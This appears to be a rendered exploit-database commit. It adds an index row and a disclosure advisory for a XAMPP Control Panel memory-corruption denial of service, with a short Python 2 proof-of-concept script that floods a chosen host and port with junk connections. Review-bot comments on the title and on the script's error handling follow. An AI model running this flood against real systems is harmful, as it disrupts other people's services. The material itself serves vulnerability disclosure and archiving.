DB: 2016-12-26
1 new exploits XAMPP Control Panel - Denial Of Service
This commit is contained in:
parent
560fb055c7
commit
af66bcd9e5
2 changed files with 150 additions and 0 deletions
@ -5329,6 +5329,7 @@ id,file,description,date,author,platform,type,port
40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
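Review bot: the new files.csv row for 40964 gives a title with no affected version ("XAMPP Control Panel - Denial Of Service"), while the advisory body in the same commit names the tested versions (XAMPP v3.2.2 and v3.1.0) and the neighbouring rows (40955, 40958, 40959) all carry a version or version range in the title; suggest "XAMPP Control Panel 3.1.0 / 3.2.2 - Denial Of Service" so the entry can be matched by version. The port column is 0, which is acceptable here since the advisory lists several target ports (3306, 8080, 21, 25, 79, 105, 106, 143) rather than a single one.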
149
platforms/windows/dos/40964.py
Executable file
@ -0,0 +1,149 @@
'''
[+] Credits: John Page (hyp3rlinx)

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt

[+] ISR: ApparitionSec



Vendor:
=====================
www.apachefriends.org




Product:
===================
XAMPP Control Panel


XAMPP is a free and open source cross-platform web server solution stack
package developed by Apache Friends,
consisting mainly of the Apache HTTP Server, MariaDB database, and
interpreters for scripts written in the PHP
and Perl programming languages.



Vulnerability Type:
=====================
Memory Corruption DOS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

XAMPP Control Panel crashes with access violation when writing junk bytes
into several different ports e.g.

Tested following ports / versions:

(MySQL) 3306 v3.2.2
(Tomcat) 8080 (XAMPP v3.1.0)
(FileZilla) 21
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.

It is not that XAMPP Control Panel is listening on some port, however
memory corruption and Denial Of Service does
occur when you constantly write junk into, for instance, the MySQL, Tomcat,
FileZilla, Mercury Mail listening ports.


1) Launch XAMPP control panel
2) Run exploit script against some ports like 3306, 79, 105 (Mercury mail)
with Apache running and or Tomcat

Target different services and port combinations to reproduce.

Important to note is that neither MySQL or Apache itself crash, it IS the
XAMPP Control Panel that crashes with Access Violation.


Tested Windows SP1


POC Video:
https://vimeo.com/196938261


Exploit code(s):
===============
'''

import socket

print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"

IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")

arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((IP,PORT)))
arr[c].send("DOOM")
print "Die!"
c+=1
except socket.error:
print "[+] Done! "
raw_input()
break



'''
Disclosure Timeline:
=======================================
Vendor Notification: November 1, 2016
Vendor acknowledgement: November 4, 2016
Vendor released Fix : December 22, 2016
(NO public mention as of the time of this writing)
December 24, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
'''
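Review bot: the `except socket.error:` branch in the new 40964.py prints "[+] Done!" on any socket error, including a connection refused on the very first `socket.create_connection((IP,PORT))`, so a run against a host where nothing is listening looks identical to a run that actually crashed the Control Panel; suggest checking that at least one connection succeeded (for example `if c == 0: print "[-] No connection made"`) before reporting success. The script is also Python 2 only (`print "..."` statements and `raw_input`), which the header comment should state, and as rendered here the bodies of `while 1:`, `try:` and `except socket.error:` carry no indentation, which Python rejects, so the committed file should be confirmed to preserve its indentation. Minor: the sockets collected in `arr` are never closed, and `arr[c]` can simply be `arr[-1]`.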